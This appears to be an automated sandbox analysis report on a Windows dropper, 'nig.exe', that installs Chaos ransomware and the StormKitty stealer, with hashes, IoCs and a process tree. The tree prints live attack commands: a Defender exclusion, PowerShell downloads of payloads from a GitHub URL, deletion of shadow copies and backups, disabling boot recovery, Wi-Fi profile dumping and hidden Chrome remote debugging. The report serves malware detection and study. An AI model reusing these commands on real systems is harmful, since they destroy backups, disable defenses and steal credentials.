Analysis
-
max time kernel
37s -
max time network
39s -
platform
windows11-21h2_x64 -
resource
win11-20250313-en -
resource tags
arch:x64arch:x86image:win11-20250313-enlocale:en-usos:windows11-21h2-x64system -
submitted
22/03/2025, 02:29
Behavioral task
behavioral1
Sample
nig.exe
Resource
win11-20250313-en
General
-
Target
nig.exe
-
Size
57KB
-
MD5
16edd47bf01716b24958a0b3a3a7bcfb
-
SHA1
8b7972f4190c2ca9d600084611e966fa0f899b98
-
SHA256
568d485f89554f0a315d1f839e5e2b33c7735f9b3dc3892391bdaa16a3f480e8
-
SHA512
9e6ca1cbfa194aff3aebb60fa7b73ee4ff63f9770cfe1d114b757d55693278ccb8f6a450235255a3ae03ac382b528b899eb973d571523fe12e3910b9568d38e1
-
SSDEEP
768:d5qkvPJg++TldUQJbxc1knPItshRGibgFfYTrTQc1mRdJcWvFM79yipBvSrrCeao:3rPJVKjbcknWSOYvTfkWkFM79yQVFu/
Malware Config
Signatures
-
Chaos
Ransomware family first seen in June 2021.
-
Chaos Ransomware 2 IoCs
resource yara_rule behavioral1/files/0x001900000002b01f-45.dat family_chaos behavioral1/memory/3268-47-0x0000000000760000-0x0000000000788000-memory.dmp family_chaos -
Chaos family
-
StormKitty
StormKitty is an open source info stealer written in C#.
-
StormKitty payload 2 IoCs
resource yara_rule behavioral1/files/0x001a00000002b020-49.dat family_stormkitty behavioral1/memory/1972-60-0x00000000004A0000-0x00000000004DC000-memory.dmp family_stormkitty -
Stormkitty family
-
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 6012 bcdedit.exe 5232 bcdedit.exe -
Blocklisted process makes network request 4 IoCs
flow pid Process 2 3940 powershell.exe 3 3940 powershell.exe 4 5208 powershell.exe 5 5208 powershell.exe -
pid Process 5660 wbadmin.exe -
Disables Task Manager via registry modification
-
Downloads MZ/PE file 2 IoCs
flow pid Process 3 3940 powershell.exe 5 5208 powershell.exe -
Uses browser remote debugging 2 TTPs 5 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
pid Process 2160 chrome.exe 2316 chrome.exe 6112 chrome.exe 4812 chrome.exe 2188 chrome.exe -
Drops startup file 3 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\readme.txt svchost.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.url svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini svchost.exe -
Executes dropped EXE 3 IoCs
pid Process 3268 build.exe 1972 kernelv.exe 5020 svchost.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 kernelv.exe Key opened \REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 kernelv.exe Key opened \REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 kernelv.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
pid Process 3940 powershell.exe 5208 powershell.exe 4676 powershell.exe -
Drops desktop.ini file(s) 64 IoCs
description ioc Process File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini svchost.exe File opened for modification C:\Users\Public\Downloads\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Searches\desktop.ini svchost.exe File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini svchost.exe File opened for modification C:\Users\Public\Music\desktop.ini svchost.exe File opened for modification C:\Users\Public\AccountPictures\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn1\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group3\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SendTo\desktop.ini svchost.exe File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\System Tools\desktop.ini svchost.exe File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Links\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Music\desktop.ini svchost.exe File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini svchost.exe File opened for modification C:\Users\Public\Desktop\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group1\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Desktop\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Favorites\Links\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Videos\desktop.ini svchost.exe File opened for modification C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group2\desktop.ini svchost.exe File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini svchost.exe File opened for modification C:\Users\Admin\Saved Games\desktop.ini svchost.exe File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini svchost.exe File opened for modification C:\Users\Public\Documents\desktop.ini svchost.exe File opened for modification F:\$RECYCLE.BIN\S-1-5-21-1136229799-3442283115-138161576-1000\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\desktop.ini svchost.exe File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\desktop.ini svchost.exe File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini svchost.exe File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\desktop.ini svchost.exe File opened for modification C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group1\desktop.ini svchost.exe File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\History\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\AccountPictures\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Favorites\desktop.ini svchost.exe File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\desktop.ini svchost.exe File opened for modification C:\Users\Public\Pictures\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn2\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Downloads\desktop.ini svchost.exe File opened for modification C:\Users\Admin\OneDrive\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Pictures\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Pictures\Saved Pictures\desktop.ini svchost.exe File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessibility\Desktop.ini svchost.exe File opened for modification C:\Users\Public\Libraries\desktop.ini svchost.exe File opened for modification C:\Users\Public\Videos\desktop.ini svchost.exe File opened for modification C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group3\desktop.ini svchost.exe File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini svchost.exe File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Documents\desktop.ini svchost.exe File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\desktop.ini svchost.exe File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group2\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Contacts\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Pictures\Camera Roll\desktop.ini svchost.exe File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\desktop.ini svchost.exe -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 1 ipinfo.io 6 ipinfo.io -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\g98dlc69x.jpg" svchost.exe -
resource yara_rule behavioral1/memory/4732-0-0x0000000140000000-0x0000000140028000-memory.dmp upx behavioral1/memory/4732-41-0x0000000140000000-0x0000000140028000-memory.dmp upx behavioral1/memory/4732-65-0x0000000140000000-0x0000000140028000-memory.dmp upx -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\SystemTemp chrome.exe -
Hide Artifacts: Ignore Process Interrupts 1 TTPs 2 IoCs
Command interpreters often include specific commands/flags that ignore errors and other hangups.
pid Process 4676 powershell.exe 408 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 8 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language chcp.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language chcp.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language kernelv.exe -
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
pid Process 3992 cmd.exe 1128 netsh.exe -
Checks SCSI registry key(s) 3 TTPs 4 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName vds.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 kernelv.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier kernelv.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe -
Interacts with shadow copies 3 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 3184 vssadmin.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000_Classes\Local Settings svchost.exe -
Opens file in notepad (likely ransom note) 1 IoCs
pid Process 288 NOTEPAD.EXE -
Runs net.exe
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 5020 svchost.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4676 powershell.exe 4676 powershell.exe 3940 powershell.exe 3940 powershell.exe 5208 powershell.exe 5208 powershell.exe 3268 build.exe 408 powershell.exe 408 powershell.exe 3268 build.exe 3268 build.exe 3268 build.exe 3268 build.exe 3268 build.exe 3268 build.exe 3268 build.exe 3268 build.exe 1972 kernelv.exe 1972 kernelv.exe 1972 kernelv.exe 1972 kernelv.exe 1972 kernelv.exe 1972 kernelv.exe 1972 kernelv.exe 1972 kernelv.exe 1972 kernelv.exe 1972 kernelv.exe 1972 kernelv.exe 1972 kernelv.exe 1972 kernelv.exe 1972 kernelv.exe 1972 kernelv.exe 1972 kernelv.exe 1972 kernelv.exe 1972 kernelv.exe 1972 kernelv.exe 1972 kernelv.exe 1972 kernelv.exe 3268 build.exe 3268 build.exe 3268 build.exe 3268 build.exe 3268 build.exe 3268 build.exe 3268 build.exe 3268 build.exe 3268 build.exe 3268 build.exe 3268 build.exe 3268 build.exe 3268 build.exe 3268 build.exe 3268 build.exe 3268 build.exe 1972 kernelv.exe 2188 chrome.exe 2188 chrome.exe 5020 svchost.exe 5020 svchost.exe 5020 svchost.exe 5020 svchost.exe 5020 svchost.exe 5020 svchost.exe 5020 svchost.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs
pid Process 2188 chrome.exe 2188 chrome.exe 2188 chrome.exe 2188 chrome.exe -
Suspicious use of AdjustPrivilegeToken 63 IoCs
description pid Process Token: SeDebugPrivilege 4676 powershell.exe Token: SeDebugPrivilege 3940 powershell.exe Token: SeDebugPrivilege 5208 powershell.exe Token: SeDebugPrivilege 3268 build.exe Token: SeDebugPrivilege 408 powershell.exe Token: SeDebugPrivilege 1972 kernelv.exe Token: SeShutdownPrivilege 2188 chrome.exe Token: SeCreatePagefilePrivilege 2188 chrome.exe Token: SeDebugPrivilege 5020 svchost.exe Token: SeShutdownPrivilege 2188 chrome.exe Token: SeCreatePagefilePrivilege 2188 chrome.exe Token: SeShutdownPrivilege 2188 chrome.exe Token: SeCreatePagefilePrivilege 2188 chrome.exe Token: SeShutdownPrivilege 2188 chrome.exe Token: SeCreatePagefilePrivilege 2188 chrome.exe Token: SeBackupPrivilege 5048 vssvc.exe Token: SeRestorePrivilege 5048 vssvc.exe Token: SeAuditPrivilege 5048 vssvc.exe Token: SeIncreaseQuotaPrivilege 5872 WMIC.exe Token: SeSecurityPrivilege 5872 WMIC.exe Token: SeTakeOwnershipPrivilege 5872 WMIC.exe Token: SeLoadDriverPrivilege 5872 WMIC.exe Token: SeSystemProfilePrivilege 5872 WMIC.exe Token: SeSystemtimePrivilege 5872 WMIC.exe Token: SeProfSingleProcessPrivilege 5872 WMIC.exe Token: SeIncBasePriorityPrivilege 5872 WMIC.exe Token: SeCreatePagefilePrivilege 5872 WMIC.exe Token: SeBackupPrivilege 5872 WMIC.exe Token: SeRestorePrivilege 5872 WMIC.exe Token: SeShutdownPrivilege 5872 WMIC.exe Token: SeDebugPrivilege 5872 WMIC.exe Token: SeSystemEnvironmentPrivilege 5872 WMIC.exe Token: SeRemoteShutdownPrivilege 5872 WMIC.exe Token: SeUndockPrivilege 5872 WMIC.exe Token: SeManageVolumePrivilege 5872 WMIC.exe Token: 33 5872 WMIC.exe Token: 34 5872 WMIC.exe Token: 35 5872 WMIC.exe Token: 36 5872 WMIC.exe Token: SeIncreaseQuotaPrivilege 5872 WMIC.exe Token: SeSecurityPrivilege 5872 WMIC.exe Token: SeTakeOwnershipPrivilege 5872 WMIC.exe Token: SeLoadDriverPrivilege 5872 WMIC.exe Token: SeSystemProfilePrivilege 5872 WMIC.exe Token: SeSystemtimePrivilege 5872 WMIC.exe Token: SeProfSingleProcessPrivilege 5872 WMIC.exe Token: SeIncBasePriorityPrivilege 5872 WMIC.exe Token: SeCreatePagefilePrivilege 5872 WMIC.exe Token: SeBackupPrivilege 5872 WMIC.exe Token: SeRestorePrivilege 5872 WMIC.exe Token: SeShutdownPrivilege 5872 WMIC.exe Token: SeDebugPrivilege 5872 WMIC.exe Token: SeSystemEnvironmentPrivilege 5872 WMIC.exe Token: SeRemoteShutdownPrivilege 5872 WMIC.exe Token: SeUndockPrivilege 5872 WMIC.exe Token: SeManageVolumePrivilege 5872 WMIC.exe Token: 33 5872 WMIC.exe Token: 34 5872 WMIC.exe Token: 35 5872 WMIC.exe Token: 36 5872 WMIC.exe Token: SeBackupPrivilege 6064 wbengine.exe Token: SeRestorePrivilege 6064 wbengine.exe Token: SeSecurityPrivilege 6064 wbengine.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 2188 chrome.exe 2188 chrome.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4732 wrote to memory of 2568 4732 nig.exe 82 PID 4732 wrote to memory of 2568 4732 nig.exe 82 PID 2568 wrote to memory of 3120 2568 cmd.exe 83 PID 2568 wrote to memory of 3120 2568 cmd.exe 83 PID 3120 wrote to memory of 4716 3120 net.exe 84 PID 3120 wrote to memory of 4716 3120 net.exe 84 PID 2568 wrote to memory of 4676 2568 cmd.exe 85 PID 2568 wrote to memory of 4676 2568 cmd.exe 85 PID 2568 wrote to memory of 3940 2568 cmd.exe 86 PID 2568 wrote to memory of 3940 2568 cmd.exe 86 PID 2568 wrote to memory of 5208 2568 cmd.exe 88 PID 2568 wrote to memory of 5208 2568 cmd.exe 88 PID 2568 wrote to memory of 3268 2568 cmd.exe 89 PID 2568 wrote to memory of 3268 2568 cmd.exe 89 PID 2568 wrote to memory of 1972 2568 cmd.exe 90 PID 2568 wrote to memory of 1972 2568 cmd.exe 90 PID 2568 wrote to memory of 1972 2568 cmd.exe 90 PID 2568 wrote to memory of 408 2568 cmd.exe 91 PID 2568 wrote to memory of 408 2568 cmd.exe 91 PID 1972 wrote to memory of 3992 1972 kernelv.exe 92 PID 1972 wrote to memory of 3992 1972 kernelv.exe 92 PID 1972 wrote to memory of 3992 1972 kernelv.exe 92 PID 3992 wrote to memory of 3600 3992 cmd.exe 94 PID 3992 wrote to memory of 3600 3992 cmd.exe 94 PID 3992 wrote to memory of 3600 3992 cmd.exe 94 PID 3992 wrote to memory of 1128 3992 cmd.exe 96 PID 3992 wrote to memory of 1128 3992 cmd.exe 96 PID 3992 wrote to memory of 1128 3992 cmd.exe 96 PID 3992 wrote to memory of 6016 3992 cmd.exe 97 PID 3992 wrote to memory of 6016 3992 cmd.exe 97 PID 3992 wrote to memory of 6016 3992 cmd.exe 97 PID 1972 wrote to memory of 6004 1972 kernelv.exe 98 PID 1972 wrote to memory of 6004 1972 kernelv.exe 98 PID 1972 wrote to memory of 6004 1972 kernelv.exe 98 PID 6004 wrote to memory of 4452 6004 cmd.exe 100 PID 6004 wrote to memory of 4452 6004 cmd.exe 100 PID 6004 wrote to memory of 4452 6004 cmd.exe 100 PID 6004 wrote to memory of 5588 6004 cmd.exe 101 PID 6004 wrote to memory of 5588 6004 cmd.exe 101 PID 6004 wrote to memory of 5588 6004 cmd.exe 101 PID 1972 wrote to memory of 2188 1972 kernelv.exe 102 PID 1972 wrote to memory of 2188 1972 kernelv.exe 102 PID 2188 wrote to memory of 1860 2188 chrome.exe 103 PID 2188 wrote to memory of 1860 2188 chrome.exe 103 PID 2188 wrote to memory of 5284 2188 chrome.exe 104 PID 2188 wrote to memory of 5284 2188 chrome.exe 104 PID 2188 wrote to memory of 5284 2188 chrome.exe 104 PID 2188 wrote to memory of 5284 2188 chrome.exe 104 PID 2188 wrote to memory of 5284 2188 chrome.exe 104 PID 2188 wrote to memory of 5284 2188 chrome.exe 104 PID 2188 wrote to memory of 5284 2188 chrome.exe 104 PID 2188 wrote to memory of 5284 2188 chrome.exe 104 PID 2188 wrote to memory of 5284 2188 chrome.exe 104 PID 2188 wrote to memory of 5284 2188 chrome.exe 104 PID 2188 wrote to memory of 5284 2188 chrome.exe 104 PID 2188 wrote to memory of 5284 2188 chrome.exe 104 PID 2188 wrote to memory of 5284 2188 chrome.exe 104 PID 2188 wrote to memory of 5284 2188 chrome.exe 104 PID 2188 wrote to memory of 5284 2188 chrome.exe 104 PID 2188 wrote to memory of 5284 2188 chrome.exe 104 PID 2188 wrote to memory of 5284 2188 chrome.exe 104 PID 2188 wrote to memory of 5284 2188 chrome.exe 104 PID 2188 wrote to memory of 5284 2188 chrome.exe 104 PID 2188 wrote to memory of 5284 2188 chrome.exe 104 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
-
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 kernelv.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 kernelv.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\nig.exe"C:\Users\Admin\AppData\Local\Temp\nig.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4732 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\755F.tmp\7560.tmp\7561.bat C:\Users\Admin\AppData\Local\Temp\nig.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:2568 -
C:\Windows\system32\net.exenet session3⤵
- Suspicious use of WriteProcessMemory
PID:3120 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 session4⤵PID:4716
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -NoProfile -ExecutionPolicy Bypass -Command "Set-MpPreference -ExclusionPath \"$env:TEMP\" -ErrorAction SilentlyContinue"3⤵
- Command and Scripting Interpreter: PowerShell
- Hide Artifacts: Ignore Process Interrupts
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4676
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -NoProfile -ExecutionPolicy Bypass -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; iwr -Uri \"https://github.com/nfdsafnsdl/login/releases/download/V1/build.exe\" -OutFile \"C:\Users\Admin\AppData\Local\Temp\build.exe\" -ErrorAction Stop"3⤵
- Blocklisted process makes network request
- Downloads MZ/PE file
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3940
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -NoProfile -ExecutionPolicy Bypass -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; iwr -Uri \"https://github.com/nfdsafnsdl/login/releases/download/V1/kernelv.exe\" -OutFile \"C:\Users\Admin\AppData\Local\Temp\kernelv.exe\" -ErrorAction Stop"3⤵
- Blocklisted process makes network request
- Downloads MZ/PE file
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5208
-
-
C:\Users\Admin\AppData\Local\Temp\build.exe"C:\Users\Admin\AppData\Local\Temp\build.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3268 -
C:\Users\Admin\AppData\Roaming\svchost.exe"C:\Users\Admin\AppData\Roaming\svchost.exe"4⤵
- Drops startup file
- Executes dropped EXE
- Drops desktop.ini file(s)
- Sets desktop wallpaper using registry
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5020 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete5⤵PID:1476
-
C:\Windows\system32\vssadmin.exevssadmin delete shadows /all /quiet6⤵
- Interacts with shadow copies
PID:3184
-
-
C:\Windows\System32\Wbem\WMIC.exewmic shadowcopy delete6⤵
- Suspicious use of AdjustPrivilegeToken
PID:5872
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no5⤵PID:4768
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy ignoreallfailures6⤵
- Modifies boot configuration data using bcdedit
PID:6012
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled no6⤵
- Modifies boot configuration data using bcdedit
PID:5232
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C wbadmin delete catalog -quiet5⤵PID:2652
-
C:\Windows\system32\wbadmin.exewbadmin delete catalog -quiet6⤵
- Deletes backup catalog
PID:5660
-
-
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Roaming\readme.txt5⤵
- Opens file in notepad (likely ransom note)
PID:288
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\kernelv.exe"C:\Users\Admin\AppData\Local\Temp\kernelv.exe"3⤵
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- outlook_office_path
- outlook_win_path
PID:1972 -
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All4⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Wi-Fi Discovery
- Suspicious use of WriteProcessMemory
PID:3992 -
C:\Windows\SysWOW64\chcp.comchcp 650015⤵
- System Location Discovery: System Language Discovery
PID:3600
-
-
C:\Windows\SysWOW64\netsh.exenetsh wlan show profile5⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Wi-Fi Discovery
PID:1128
-
-
C:\Windows\SysWOW64\findstr.exefindstr All5⤵
- System Location Discovery: System Language Discovery
PID:6016
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:6004 -
C:\Windows\SysWOW64\chcp.comchcp 650015⤵
- System Location Discovery: System Language Discovery
PID:4452
-
-
C:\Windows\SysWOW64\netsh.exenetsh wlan show networks mode=bssid5⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:5588
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"4⤵
- Uses browser remote debugging
